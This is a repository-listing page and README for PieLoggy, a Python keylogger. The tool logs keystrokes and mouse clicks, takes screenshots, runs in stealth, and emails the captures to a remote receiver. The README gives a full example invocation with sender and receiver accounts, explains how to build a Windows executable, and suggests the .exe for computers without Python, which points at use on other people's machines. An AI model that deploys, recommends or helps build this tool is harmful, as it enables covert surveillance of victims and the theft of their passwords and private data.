https://github.com/cudiph/pieloggy
Keylogger made in python with CLI
https://github.com/cudiph/pieloggy
keylogger keylogger-email keylogger-python keylogger-screenshot
Last synced: 7 months ago
JSON representation
Keylogger made in python with CLI
- Host: GitHub
- URL: https://github.com/cudiph/pieloggy
- Owner: Cudiph
- License: gpl-3.0
- Created: 2021-06-08T17:23:39.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2021-06-08T18:56:43.000Z (about 5 years ago)
- Last Synced: 2025-03-18T10:47:05.909Z (about 1 year ago)
- Topics: keylogger, keylogger-email, keylogger-python, keylogger-screenshot
- Language: Python
- Homepage:
- Size: 21.5 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# PieLoggy
PieLoggy is a modified version from [D4Vinci/PyLoggy](https://github.com/D4Vinci/PyLoggy) as a CLI version and work in python 3. Able to log keystrokes, log mouse clicks, take screenshots and more! The tool will send the logs to your email every x minutes.
## Features
- Fast
- Lightweight
- Screenshot
- Email
- Stealth
- Ease of use
## Example Usage
```ps1
> python ./src/PieLoggy.py -g example@gmail.com -p examplePassword -r examplereceiver@gmail.com --ss-interval=30 --mail-interval=300 -f 'D:/test/'
```
It'll run the program and screenshot every 30 seconds, mail it every 5 minutes, example as a sender account, examplePassword as an example account password, examplereceiver as a receiver account and `D:/test/` as a location where the logs and screenshot stored locally.
## Using gmail
To use gmail function you need to enable [allow less secure apps](https://myaccount.google.com/lesssecureapps) (only for sender gmail)
### Note
- To generate .exe file you can execute `build.ps1`, make sure you install the dependencies first with `> pipenv install`
- Tested in python 3.8 not sure if other version is working.
- Consider using .exe because perhaps someone's computer doesn't have python installed.